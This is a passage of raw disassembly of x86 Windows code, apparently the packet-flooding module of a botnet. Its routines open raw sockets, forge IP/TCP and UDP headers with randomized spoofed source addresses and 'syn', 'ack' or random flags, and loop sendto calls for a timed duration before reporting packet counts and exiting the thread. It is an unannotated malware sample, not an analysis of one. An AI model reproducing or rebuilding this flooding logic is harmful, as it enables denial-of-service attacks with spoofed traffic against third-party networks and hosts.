push offset asc_44CE88 ; "-"
push eax ; Dest
call _sprintf
add esp, 0Ch
cmp [ebp+var_A8], ebx
jnz short loc_41495F
push ebx ; int
lea eax, [ebp+Dest]
push [ebp+var_AC] ; int
push eax ; int
lea eax, [ebp+var_13C]
push eax ; Str
push [ebp+var_240] ; int
call sub_409D34
add esp, 14h
loc_41495F: ; CODE XREF: sub_4148B6+84�j
lea eax, [ebp+Dest]
push eax
call sub_415C3F
push [ebp+var_BC]
call sub_40BA72
pop ecx
pop ecx
push ebx
call ds:dword_4F53A0 ; ExitThread
loc_41497F: ; CODE XREF: sub_4148B6+61�j
lea ecx, [ebp+var_34]
push 4
push ecx
push 2
push ebx
push eax
mov [ebp+var_34], esi
call dword_4E30D8 ; setsockopt
cmp eax, 0FFFFFFFFh
jnz short loc_4149FD
call dword_4E308C ; WSAGetLastError
push eax
lea eax, [ebp+Dest]
push offset asc_44CEBC ; "-"
push eax ; Dest
call _sprintf
add esp, 0Ch
cmp [ebp+var_A8], ebx
jnz short loc_4149DD
push ebx ; int
lea eax, [ebp+Dest]
push [ebp+var_AC] ; int
push eax ; int
lea eax, [ebp+var_13C]
push eax ; Str
push [ebp+var_240] ; int
call sub_409D34
add esp, 14h
loc_4149DD: ; CODE XREF: sub_4148B6+102�j
lea eax, [ebp+Dest]
push eax
call sub_415C3F
push [ebp+var_BC]
call sub_40BA72
pop ecx
pop ecx
push ebx
call ds:dword_4F53A0 ; ExitThread
loc_4149FD: ; CODE XREF: sub_4148B6+DF�j
lea eax, [ebp+var_23C]
push eax
call dword_4E3138 ; inet_addr
cmp eax, 0FFFFFFFFh
jnz short loc_414A6D
lea eax, [ebp+Dest]
push offset asc_44CEF4 ; "-"
push eax ; Dest
call _sprintf
cmp [ebp+var_A8], ebx
pop ecx
pop ecx
jnz short loc_414A4D
push ebx ; int
lea eax, [ebp+Dest]
push [ebp+var_AC] ; int
push eax ; int
lea eax, [ebp+var_13C]
push eax ; Str
push [ebp+var_240] ; int
call sub_409D34
add esp, 14h
loc_414A4D: ; CODE XREF: sub_4148B6+172�j
lea eax, [ebp+Dest]
push eax
call sub_415C3F
push [ebp+var_BC]
call sub_40BA72
pop ecx
pop ecx
push ebx
call ds:dword_4F53A0 ; ExitThread
loc_414A6D: ; CODE XREF: sub_4148B6+157�j
push 10h ; Size
lea eax, [ebp+Dst]
push ebx ; Val
push eax ; Dst
call _memset
add esp, 0Ch
mov [ebp+Dst], 2
push ebx
call dword_4E30F8 ; htons
mov [ebp+var_42], ax
lea eax, [ebp+var_23C]
push eax
call dword_4E3138 ; inet_addr
mov [ebp+var_40], eax
mov [ebp+arg_0], ebx
call edi ; GetTickCount
mov [ebp+var_30], eax
loc_414AA5: ; CODE XREF: sub_4148B6+430�j
call edi ; GetTickCount
sub eax, [ebp+var_30]
xor edx, edx
mov ecx, 3E8h
div ecx
cmp eax, [ebp+var_B4]
ja loc_414D69
push 28h
mov [ebp+var_2C], 45h
call dword_4E30F8 ; htons
cmp [ebp+var_B0], ebx
mov [ebp+var_2A], ax
mov [ebp+var_28], si
mov [ebp+var_26], bx
mov [ebp+var_24], 80h
mov [ebp+var_23], 6
mov [ebp+var_22], bx
jz short loc_414B18
call _rand
mov esi, eax
shl esi, 8
call _rand
add esi, eax
shl esi, 8
call _rand
add esi, eax
shl esi, 8
call _rand
add esi, eax
push 1
mov [ebp+var_20], esi
pop esi
jmp short loc_414B2E
; ---------------------------------------------------------------------------
loc_414B18: ; CODE XREF: sub_4148B6+233�j
push [ebp+var_240]
call sub_40AF71
pop ecx
push eax
call dword_4E3138 ; inet_addr
mov [ebp+var_20], eax
loc_414B2E: ; CODE XREF: sub_4148B6+260�j
mov eax, [ebp+var_40]
cmp [ebp+var_B8], ebx
mov [ebp+var_1C], eax
jnz short loc_414B4C
call _rand
cdq
mov ecx, 401h
idiv ecx
push edx
jmp short loc_414B52
; ---------------------------------------------------------------------------
loc_414B4C: ; CODE XREF: sub_4148B6+284�j
push [ebp+var_B8]
loc_414B52: ; CODE XREF: sub_4148B6+294�j
call dword_4E30F8 ; htons
mov [ebp+var_16], ax
call _rand
cdq
mov ecx, 401h
idiv ecx
push edx
call dword_4E30F8 ; htons
push 12345678h
mov [ebp+var_18], ax
call dword_4E30F4 ; htonl
mov [ebp+var_14], eax
lea eax, [ebp+Str]
push offset aSyn_1 ; "syn"
push eax ; Str
call _strstr
pop ecx
test eax, eax
pop ecx
jz short loc_414BA2
mov [ebp+var_10], ebx
mov [ebp+var_B], 2
jmp short loc_414BFE
; ---------------------------------------------------------------------------
loc_414BA2: ; CODE XREF: sub_4148B6+2E1�j
lea eax, [ebp+Str]
push offset aAck_0 ; "ack"
push eax ; Str
call _strstr
pop ecx
test eax, eax
pop ecx
jz short loc_414BC2
mov [ebp+var_10], ebx
mov [ebp+var_B], 10h
jmp short loc_414BFE
; ---------------------------------------------------------------------------
loc_414BC2: ; CODE XREF: sub_4148B6+301�j
lea eax, [ebp+Str]
push offset aRandom_2 ; "random"
push eax ; Str
call _strstr
pop ecx
test eax, eax
pop ecx
jz short loc_414BFE
call _rand
push 3
cdq
pop ecx
idiv ecx
mov [ebp+var_10], edx
call _rand
push 2
cdq
pop ecx
idiv ecx
neg edx
sbb dl, dl
and dl, 0Eh
add dl, cl
mov [ebp+var_B], dl
loc_414BFE: ; CODE XREF: sub_4148B6+2EA�j
; sub_4148B6+30A�j ...
push 200h
mov [ebp+var_C], 50h
call dword_4E30F8 ; htons
mov [ebp+var_A], ax
mov eax, [ebp+var_20]
mov [ebp+Src], eax
mov eax, [ebp+var_1C]
push 14h
mov [ebp+var_6], bx
mov [ebp+var_8], bx
mov [ebp+var_60], eax
mov [ebp+var_5C], bl
mov [ebp+var_5B], 6
call dword_4E30F8 ; htons
mov [ebp+var_5A], ax
lea eax, [ebp+Src]
push 20h ; Size
push eax ; Src
lea eax, [ebp+var_A0]
push eax ; Dst
call _memcpy
lea eax, [ebp+var_18]
push 14h ; Size
push eax ; Src
lea eax, [ebp+var_80]
push eax ; Dst
call _memcpy
lea eax, [ebp+var_A0]
push 34h
push eax
call sub_40AFCA
mov [ebp+var_8], ax
lea eax, [ebp+var_2C]
push 14h ; Size
push eax ; Src
lea eax, [ebp+var_A0]
push eax ; Dst
call _memcpy
lea eax, [ebp+var_18]
push 14h ; Size
push eax ; Src
lea eax, [ebp+var_8C]
push eax ; Dst
call _memcpy
push 4 ; Size
lea eax, [ebp+var_78]
push ebx ; Val
push eax ; Dst
call _memset
add esp, 44h
lea eax, [ebp+var_A0]
push 28h
push eax
call sub_40AFCA
mov [ebp+var_22], ax
lea eax, [ebp+var_2C]
push 14h ; Size
push eax ; Src
lea eax, [ebp+var_A0]
push eax ; Dst
call _memcpy
add esp, 14h
lea eax, [ebp+Dst]
push 10h
push eax
push ebx
lea eax, [ebp+var_A0]
push 3Ch
push eax
push [ebp+var_4]
call dword_4E315C ; sendto
cmp eax, 0FFFFFFFFh
jz short loc_414CEB
inc [ebp+arg_0]
jmp loc_414AA5
; ---------------------------------------------------------------------------
loc_414CEB: ; CODE XREF: sub_4148B6+42B�j
push [ebp+var_4]
call dword_4E3190 ; closesocket
call dword_4E308C ; WSAGetLastError
push eax
lea eax, [ebp+var_23C]
push [ebp+arg_0]
push eax
push offset asc_44CF24 ; "-"
lea eax, [ebp+Dest]
push 200h ; Count
push eax ; Dest
call __snprintf
add esp, 18h
cmp [ebp+var_A8], ebx
jnz short loc_414D49
push ebx ; int
lea eax, [ebp+Dest]
push [ebp+var_AC] ; int
push eax ; int
lea eax, [ebp+var_13C]
push eax ; Str
push [ebp+var_240] ; int
call sub_409D34
add esp, 14h
loc_414D49: ; CODE XREF: sub_4148B6+46E�j
lea eax, [ebp+Dest]
push eax
call sub_415C3F
push [ebp+var_BC]
call sub_40BA72
pop ecx
pop ecx
push ebx
call ds:dword_4F53A0 ; ExitThread
loc_414D69: ; CODE XREF: sub_4148B6+203�j
push [ebp+var_4]
call dword_4E3190 ; closesocket
mov eax, [ebp+arg_0]
xor edx, edx
imul eax, 3Ch
mov ecx, eax
shr eax, 0Ah
div [ebp+var_B4]
shr ecx, 14h
push ecx
push eax
lea eax, [ebp+var_23C]
push [ebp+arg_0]
push eax
lea eax, [ebp+Str]
push eax
lea eax, [ebp+Dest]
push offset asc_44CF74 ; "-"
push eax ; Dest
call _sprintf
add esp, 1Ch
cmp [ebp+var_A8], ebx
jnz short loc_414DDA
push ebx ; int
lea eax, [ebp+Dest]
push [ebp+var_AC] ; int
push eax ; int
lea eax, [ebp+var_13C]
push eax ; Str
push [ebp+var_240] ; int
call sub_409D34
add esp, 14h
loc_414DDA: ; CODE XREF: sub_4148B6+4FF�j
lea eax, [ebp+Dest]
push eax
call sub_415C3F
push [ebp+var_BC]
call sub_40BA72
pop ecx
pop ecx
push ebx
call ds:dword_4F53A0 ; ExitThread
sub_4148B6 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_414DFA proc near ; CODE XREF: sub_414F04+19A�p
; sub_414F04+1A9�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
mov eax, [ebp+arg_4]
mov edx, [ebp+arg_0]
push esi
xor esi, esi
cmp eax, 1
mov [ebp+arg_4], esi
jle short loc_414E26
mov ecx, eax
push edi
shr ecx, 1
lea edi, [ecx+ecx]
sub eax, edi
loc_414E18: ; CODE XREF: sub_414DFA+26�j
movzx edi, word ptr [edx]
add esi, edi
inc edx
inc edx
dec ecx
jnz short loc_414E18
pop edi
cmp eax, 1
loc_414E26: ; CODE XREF: sub_414DFA+12�j
jnz short loc_414E33
mov al, [edx]
mov byte ptr [ebp+arg_4], al
movzx eax, word ptr [ebp+arg_4]
add esi, eax
loc_414E33: ; CODE XREF: sub_414DFA:loc_414E26�j
mov ecx, esi
and esi, 0FFFFh
sar ecx, 10h
add ecx, esi
pop esi
mov eax, ecx
sar eax, 10h
add eax, ecx
not eax
pop ebp
retn
sub_414DFA endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_414E4C proc near ; DATA XREF: sub_401CC7+6DCA�o
Dest = byte ptr -394h
var_194 = dword ptr -194h
var_190 = byte ptr -190h
Str = byte ptr -110h
var_90 = byte ptr -90h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 394h
mov eax, [ebp+arg_0]
push esi
push edi
push 65h
pop ecx
mov esi, eax
lea edi, [ebp+var_194]
rep movsd
mov dword ptr [eax+190h], 1
lea eax, [ebp+Str]
push eax ; Str
call _atoi
pop ecx
push eax
lea eax, [ebp+var_190]
push eax
call dword_4E3138 ; inet_addr
push eax
lea esi, [ebp+var_194]
sub esp, 194h
push 65h
pop ecx
mov edi, esp
rep movsd
call sub_414F04
add esp, 19Ch
push eax
lea eax, [ebp+Dest]
push offset asc_44CFC4 ; "-"
push eax ; Dest
call _sprintf
xor esi, esi
add esp, 0Ch
cmp [ebp+var_8], esi
jnz short loc_414EE7
push esi ; int
lea eax, [ebp+Dest]
push [ebp+var_C] ; int
push eax ; int
lea eax, [ebp+var_90]
push eax ; Str
push [ebp+var_194] ; int
call sub_409D34
add esp, 14h
loc_414EE7: ; CODE XREF: sub_414E4C+79�j
lea eax, [ebp+Dest]
push eax
call sub_415C3F
push [ebp+var_10]
call sub_40BA72
pop ecx
pop ecx
push esi
call ds:dword_4F53A0 ; ExitThread
sub_414E4C endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_414F04 proc near ; CODE XREF: sub_414E4C+54�p
Dest = byte ptr -0CCh
var_AC = dword ptr -0ACh
var_A8 = dword ptr -0A8h
var_A4 = byte ptr -0A4h
var_A3 = byte ptr -0A3h
var_A2 = word ptr -0A2h
Src = byte ptr -0A0h
var_8C = byte ptr -8Ch
var_78 = word ptr -78h
var_76 = word ptr -76h
var_74 = dword ptr -74h
var_68 = byte ptr -68h
var_64 = byte ptr -64h
var_63 = byte ptr -63h
var_62 = byte ptr -62h
var_58 = dword ptr -58h
var_54 = byte ptr -54h
var_52 = word ptr -52h
var_50 = word ptr -50h
var_4E = word ptr -4Eh
var_4C = byte ptr -4Ch
var_4B = byte ptr -4Bh
var_4A = word ptr -4Ah
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = word ptr -40h
var_3E = word ptr -3Eh
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = word ptr -30h
var_2E = word ptr -2Eh
var_2C = word ptr -2Ch
Dst = byte ptr -28h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_194 = dword ptr 19Ch
arg_198 = dword ptr 1A0h
push ebp
mov ebp, esp
sub esp, 0CCh
push ebx
push esi
mov esi, ds:dword_4F537C
xor ebx, ebx
push edi
mov [ebp+var_4], ebx
call esi ; GetTickCount
push 0FFh
push 3
push 2
mov [ebp+var_10], eax
call dword_4E3178 ; socket
mov [ebp+var_8], eax
call esi ; GetTickCount
push eax ; Seed
call _srand
pop ecx
mov edi, 578h
push edi ; Size
push 9
push 1
call sub_419551
pop ecx
pop ecx
push eax ; Val
lea eax, [ebp+Dst]
push eax ; Dst
call _memset
add esp, 0Ch
mov esi, 5A0h
loc_414F5E: ; CODE XREF: sub_414F04+235�j
call ds:dword_4F537C ; GetTickCount
sub eax, [ebp+var_10]
xor edx, edx
mov ecx, 3E8h
div ecx
cmp eax, [ebp+arg_198]
ja loc_41513E
cmp dword_4E68F0, ebx
jnz short loc_414FDD
push 10h
pop eax
mov [ebp+var_14], eax
push eax ; Size
lea eax, [ebp+var_68]
push ebx ; Val
push eax ; Dst
call _memset
add esp, 0Ch
lea eax, [ebp+var_14]
push eax
lea eax, [ebp+var_68]
push eax
push [ebp+arg_0]
call dword_4E309C ; getsockname
push 0FFh
push 1
call sub_419551
pop ecx
pop ecx
push eax
movzx eax, [ebp+var_62]
push eax
movzx eax, [ebp+var_63]
push eax
movzx eax, [ebp+var_64]
push eax
lea eax, [ebp+Dest]
push offset aD_D_D_D_1 ; "%d.%d.%d.%d"
push eax ; Dest
call _sprintf
add esp, 18h
jmp short loc_414FF0
; ---------------------------------------------------------------------------
loc_414FDD: ; CODE XREF: sub_414F04+7E�j
lea eax, [ebp+Dest]
push offset byte_4E62D0 ; Source
push eax ; Dest
call _strcpy
pop ecx
pop ecx
loc_414FF0: ; CODE XREF: sub_414F04+D7�j
lea eax, [ebp+Dest]
push eax
call dword_4E3138 ; inet_addr
mov [ebp+var_C], eax
mov eax, [ebp+var_58]
and al, 45h
push esi
or al, 45h
mov [ebp+var_54], 10h
mov [ebp+var_58], eax
call dword_4E30F8 ; htons
mov [ebp+var_52], ax
call _rand
mov [ebp+var_50], ax
mov eax, [ebp+var_C]
mov [ebp+var_48], eax
mov eax, [ebp+arg_194]
mov [ebp+var_4E], 40h
mov [ebp+var_4C], 40h
mov [ebp+var_4B], 6
mov [ebp+var_4A], bx
mov [ebp+var_44], eax
call _rand
mov [ebp+var_40], ax
call _rand
mov [ebp+var_3E], ax
call _rand
mov [ebp+var_3C], eax
call _rand
mov [ebp+var_38], eax
mov eax, [ebp+var_34]
and ax, 0FF50h
push 14h
or al, 50h
mov byte ptr [ebp+var_34+2], 18h
mov word ptr [ebp+var_34], ax
mov ax, [ebp+var_3E]
mov [ebp+var_76], ax
mov eax, [ebp+var_44]
mov [ebp+var_74], eax
lea eax, [ebp+var_58]
push eax
mov [ebp+var_30], 787Dh
mov [ebp+var_2E], bx
mov [ebp+var_2C], bx
mov [ebp+var_78], 2
call sub_414DFA
mov [ebp+var_4A], ax
lea eax, [ebp+var_58]
push 28h
push eax
call sub_414DFA
mov eax, [ebp+var_48]
add esp, 10h
mov [ebp+var_AC], eax
mov eax, [ebp+var_44]
push 58Ch
mov [ebp+var_A8], eax
mov [ebp+var_A4], bl
mov [ebp+var_A3], 6
call ds:dword_4F552C ; htons
mov [ebp+var_A2], ax
lea eax, [ebp+Src]
push 14h ; Size
push eax ; Src
lea eax, [ebp+var_40]
push eax ; Dst
call _memcpy
lea eax, [ebp+var_8C]
push edi ; Size
push eax ; Src
lea eax, [ebp+Dst]
push eax ; Dst
call _memcpy
lea eax, [ebp+var_AC]
push 598h
push eax
call sub_414DFA
add esp, 20h
mov [ebp+var_2E], ax
push 10h
lea eax, [ebp+var_78]
push eax
push ebx
lea eax, [ebp+var_58]
push esi
push eax
push [ebp+var_8]
call dword_4E315C ; sendto
inc [ebp+var_4]
jmp loc_414F5E
; ---------------------------------------------------------------------------
loc_41513E: ; CODE XREF: sub_414F04+72�j
push [ebp+var_8]
call dword_4E3190 ; closesocket
mov eax, [ebp+var_4]
pop edi
pop esi
pop ebx
leave
retn
sub_414F04 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41514F proc near ; DATA XREF: sub_401CC7+4D40�o
Dest = byte ptr -414h
var_214 = byte ptr -214h
var_10 = dword ptr -10h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 414h
mov edx, [ebp+arg_0]
push esi
mov eax, 85h
push edi
mov ecx, eax
mov esi, edx
lea edi, [ebp+var_214]
sub esp, 214h
rep movsd
mov ecx, eax
lea esi, [ebp+var_214]
mov edi, esp
mov dword ptr [edx+210h], 1
rep movsd
call sub_4151C6
add esp, 214h
push eax
lea eax, [ebp+Dest]
push offset asc_44D004 ; "-"
push eax ; Dest
call _sprintf
lea eax, [ebp+Dest]
push eax
call sub_415C3F
push [ebp+var_10]
call sub_40BA72
add esp, 14h
push 0
call ds:dword_4F53A0 ; ExitThread
sub_41514F endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_4151C6(int,char,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,char,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,char Str,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,char,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int)
sub_4151C6 proc near ; CODE XREF: sub_41514F+3B�p
Dest = byte ptr -254h
var_54 = byte ptr -54h
Dst = byte ptr -34h
var_30 = byte ptr -30h
var_2F = byte ptr -2Fh
var_2E = byte ptr -2Eh
var_24 = word ptr -24h
var_22 = word ptr -22h
var_20 = dword ptr -20h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = byte ptr 0Ch
arg_84 = byte ptr 8Ch
Str = byte ptr 10Ch
arg_184 = byte ptr 18Ch
arg_208 = dword ptr 210h
arg_20C = dword ptr 214h
push ebp
mov ebp, esp
sub esp, 254h
push ebx
push esi
mov ebx, 0FFh
push edi
push ebx
push 3
push 2
call dword_4E3178 ; socket
cmp eax, 0FFFFFFFFh
mov [ebp+var_C], eax
jnz short loc_415204
lea eax, [ebp+Dest]
push offset asc_44D044 ; "-"
push eax ; Dest
call _sprintf
pop ecx
xor edi, edi
pop ecx
jmp loc_4154CD
; ---------------------------------------------------------------------------
loc_415204: ; CODE XREF: sub_4151C6+22�j
lea ecx, [ebp+var_14]
push 4
push ecx
xor edi, edi
push 2
push edi
push eax
mov [ebp+var_14], 1
call dword_4E30D8 ; setsockopt
cmp eax, 0FFFFFFFFh
jnz short loc_415230
call dword_4E308C ; WSAGetLastError
push eax
push offset unk_44D070
jmp short loc_41524B
; ---------------------------------------------------------------------------
loc_415230: ; CODE XREF: sub_4151C6+5A�j
lea eax, [ebp+arg_4]
push eax
call dword_4E3138 ; inet_addr
cmp eax, 0FFFFFFFFh
jnz short loc_41525F
call dword_4E308C ; WSAGetLastError
push eax
push offset asc_44D0C0 ; "-"
loc_41524B: ; CODE XREF: sub_4151C6+68�j
lea eax, [ebp+Dest]
push eax ; Dest
call _sprintf
add esp, 0Ch
jmp loc_4154CD
; ---------------------------------------------------------------------------
loc_41525F: ; CODE XREF: sub_4151C6+77�j
push edi
mov [ebp+var_24], 2
call dword_4E30F8 ; htons
mov [ebp+var_22], ax
lea eax, [ebp+arg_4]
push eax
call ds:dword_4F5528 ; inet_addr
mov esi, ds:dword_4F537C
mov [ebp+var_20], eax
call esi ; GetTickCount
mov [ebp+var_8], eax
lea eax, [ebp+arg_4]
push eax
lea eax, [ebp+Dest]
push offset asc_44D104 ; "-"
push eax ; Dest
call _sprintf
add esp, 0Ch
cmp [ebp+arg_20C], edi
jnz short loc_4152C8
push edi ; int
lea eax, [ebp+Dest]
push [ebp+arg_208] ; int
push eax ; int
lea eax, [ebp+arg_184]
push eax ; Str
push [ebp+arg_0] ; int
call sub_409D34
add esp, 14h
loc_4152C8: ; CODE XREF: sub_4151C6+E0�j
mov [ebp+var_4], edi
call esi ; GetTickCount
sub eax, [ebp+var_8]
xor edx, edx
mov ecx, 3E8h
div ecx
mov esi, eax
lea eax, [ebp+Str]
push eax ; Str
call _atoi
cmp esi, eax
pop ecx
ja loc_415483
mov esi, 41Ch
jmp short loc_4152FC
; ---------------------------------------------------------------------------
loc_4152F7: ; CODE XREF: sub_4151C6+2B7�j
mov ebx, 0FFh
loc_4152FC: ; CODE XREF: sub_4151C6+12F�j
cmp dword_4E68F0, edi
jnz short loc_415356
push 10h
pop eax
mov [ebp+var_10], eax
push eax ; Size
lea eax, [ebp+Dst]
push edi ; Val
push eax ; Dst
call _memset
add esp, 0Ch
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+Dst]
push eax
push [ebp+arg_0]
call dword_4E309C ; getsockname
push ebx
push 1
call sub_419551
pop ecx
pop ecx
push eax
movzx eax, [ebp+var_2E]
push eax
movzx eax, [ebp+var_2F]
push eax
movzx eax, [ebp+var_30]
push eax
lea eax, [ebp+var_54]
push offset aD_D_D_D_2 ; "%d.%d.%d.%d"
push eax ; Dest
call _sprintf
add esp, 18h
jmp short loc_415366
; ---------------------------------------------------------------------------
loc_415356: ; CODE XREF: sub_4151C6+13C�j
lea eax, [ebp+var_54]
push offset byte_4E62D0 ; Source
push eax ; Dest
call _strcpy
pop ecx
pop ecx
loc_415366: ; CODE XREF: sub_4151C6+18E�j
push esi
mov byte_4E64D0, 45h
call dword_4E30F8 ; htons
mov word_4E64D2, ax
lea eax, [ebp+var_54]
push eax
mov word_4E64D4, 1
mov word_4E64D6, di
mov byte_4E64D8, 80h
mov byte_4E64D9, 11h
mov word_4E64DA, di
call dword_4E3138 ; inet_addr
mov dword_4E64DC, eax
mov eax, [ebp+var_20]
mov dword_4E64E0, eax
lea eax, [ebp+arg_84]
push eax ; Str
mov word_4E64EA, di
call _atoi
test eax, eax
pop ecx
jnz short loc_4153DE
call _rand
cdq
mov ecx, 401h
idiv ecx
push edx
jmp short loc_4153EC
; ---------------------------------------------------------------------------
loc_4153DE: ; CODE XREF: sub_4151C6+206�j
lea eax, [ebp+arg_84]
push eax ; Str
call _atoi
pop ecx
push eax
loc_4153EC: ; CODE XREF: sub_4151C6+216�j
call dword_4E30F8 ; htons
mov word_4E64E6, ax
call _rand
cdq
mov ecx, 401h
push 408h
idiv ecx
mov word_4E64E4, dx
call dword_4E30F8 ; htons
push 400h ; Size
mov word_4E64E8, ax
call _rand
cdq
idiv ebx
push edx ; Val
push offset dword_4E64EC ; Dst
call _memset
add esp, 0Ch
lea eax, [ebp+var_24]
push 10h
push eax
push edi
push esi
push offset byte_4E64D0
push [ebp+var_C]
call dword_4E315C ; sendto
cmp eax, 0FFFFFFFFh
jz loc_4154FC
inc [ebp+var_4]
call ds:dword_4F537C ; GetTickCount
sub eax, [ebp+var_8]
xor edx, edx
mov ecx, 3E8h
div ecx
mov ebx, eax
lea eax, [ebp+Str]
push eax ; Str
call _atoi
cmp ebx, eax
pop ecx
jbe loc_4152F7
loc_415483: ; CODE XREF: sub_4151C6+124�j
push [ebp+var_C]
call dword_4E3190 ; closesocket
mov esi, [ebp+var_4]
lea eax, [ebp+Str]
push eax ; Str
imul esi, 41Ch
call _atoi
pop ecx
xor edx, edx
mov ecx, eax
mov eax, esi
shr eax, 0Ah
div ecx
shr esi, 14h
push eax
push esi
push [ebp+var_4]
lea eax, [ebp+arg_4]
push eax
push offset asc_44D1C8 ; "-"
loc_4154BE: ; CODE XREF: sub_4151C6+34A�j
lea eax, [ebp+Dest]
push eax ; Dest
call _sprintf
add esp, 18h
loc_4154CD: ; CODE XREF: sub_4151C6+39�j
; sub_4151C6+94�j
cmp [ebp+arg_20C], edi
jnz short loc_4154F5
push edi ; int
lea eax, [ebp+Dest]
push [ebp+arg_208] ; int
push eax ; int
lea eax, [ebp+arg_184]
push eax ; Str
push [ebp+arg_0] ; int
call sub_409D34
add esp, 14h
loc_4154F5: ; CODE XREF: sub_4151C6+30D�j
pop edi
pop esi
xor eax, eax
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_4154FC: ; CODE XREF: sub_4151C6+28B�j
push [ebp+var_4]
push esi
call dword_4E308C ; WSAGetLastError
push eax
lea eax, [ebp+arg_4]
push eax
push offset unk_44D13C
jmp short loc_4154BE
sub_4151C6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_415512 proc near ; DATA XREF: sub_401CC7+63E2�o
Dest = byte ptr -414h
var_214 = dword ptr -214h
var_210 = byte ptr -210h
var_190 = byte ptr -190h
Str = byte ptr -110h
var_90 = byte ptr -90h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 414h
mov eax, [ebp+arg_0]
push esi
push edi
mov ecx, 85h
mov esi, eax
lea edi, [ebp+var_214]
rep movsd
mov dword ptr [eax+210h], 1
lea eax, [ebp+Str]
push eax ; Str
call _atoi
pop ecx
push eax
lea eax, [ebp+var_190]
push eax ; Str
call _atoi
pop ecx
push eax
lea eax, [ebp+var_210]
push eax
call dword_4E3138 ; inet_addr
push eax
call sub_4156AF
add esp, 0Ch
push eax
lea eax, [ebp+Dest]
push offset asc_44D22C ; "-"
push eax ; Dest
call _sprintf
xor esi, esi
add esp, 0Ch
cmp [ebp+var_8], esi
jnz short loc_4155A7
push esi ; int
lea eax, [ebp+Dest]
push [ebp+var_C] ; int
push eax ; int
lea eax, [ebp+var_90]
push eax ; Str
push [ebp+var_214] ; int
call sub_409D34
add esp, 14h
loc_4155A7: ; CODE XREF: sub_415512+73�j
lea eax, [ebp+Dest]
push eax
call sub_415C3F
push [ebp+var_10]
call sub_40BA72
pop ecx
pop ecx
push esi
call ds:dword_4F53A0 ; ExitThread
pop edi
pop esi
sub_415512 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4155C6 proc near ; CODE XREF: sub_4156AF+191�p
var_210 = dword ptr -210h
var_20C = dword ptr -20Ch
var_10C = dword ptr -10Ch
var_108 = dword ptr -108h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 210h
and [ebp+var_4], 0
cmp [ebp+arg_C], 0
push esi
push edi
jnz short loc_4155EF
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call ds:dword_4F5530 ; connect
jmp loc_4156AB
; ---------------------------------------------------------------------------
loc_4155EF: ; CODE XREF: sub_4155C6+13�j
mov esi, [ebp+arg_0]
push 1
pop edi
lea eax, [ebp+var_8]
push eax
push 8004667Eh
push esi
mov [ebp+var_8], edi
call ds:dword_4F5514 ; ioctlsocket
push [ebp+arg_8]
push [ebp+arg_4]
push esi
call dword_4E30A0 ; connect
push [ebp+arg_C]
lea eax, [ebp+var_210]
mov [ebp+var_108], esi
mov [ebp+var_10C], edi
push 0
push eax
lea eax, [ebp+var_10C]
mov [ebp+var_20C], esi
push eax
lea eax, [esi+1]
push eax
mov [ebp+var_210], edi
call dword_4E30E0 ; select
test eax, eax
jnz short loc_415653
or eax, 0FFFFFFFFh
jmp short loc_4156AB
; ---------------------------------------------------------------------------
loc_415653: ; CODE XREF: sub_4155C6+86�j
or edi, 0FFFFFFFFh
cmp eax, edi
jnz short loc_41565E
loc_41565A: ; CODE XREF: sub_4155C6+B8�j
; sub_4155C6+DC�j
mov eax, edi
jmp short loc_4156AB
; ---------------------------------------------------------------------------
loc_41565E: ; CODE XREF: sub_4155C6+92�j
lea eax, [ebp+var_10C]
push eax
push esi
call sub_43ABA2 ; __WSAFDIsSet
test eax, eax
jnz short loc_415680
lea eax, [ebp+var_210]
push eax
push esi
call sub_43ABA2 ; __WSAFDIsSet
test eax, eax
jz short loc_41565A
loc_415680: ; CODE XREF: sub_4155C6+A7�j
lea eax, [ebp+arg_0]
mov [ebp+arg_0], 4
push eax
lea eax, [ebp+var_4]
push eax
push 1007h
push 0FFFFh
push esi
call ds:dword_4F54FC ; getsockopt
cmp eax, edi
jz short loc_41565A
mov eax, [ebp+var_4]
neg eax
sbb eax, eax
loc_4156AB: ; CODE XREF: sub_4155C6+24�j
; sub_4155C6+8B�j ...
pop edi
pop esi
leave
retn
sub_4155C6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4156AF proc near ; CODE XREF: sub_415512+51�p
var_10C = dword ptr -10Ch
var_108 = dword ptr -108h
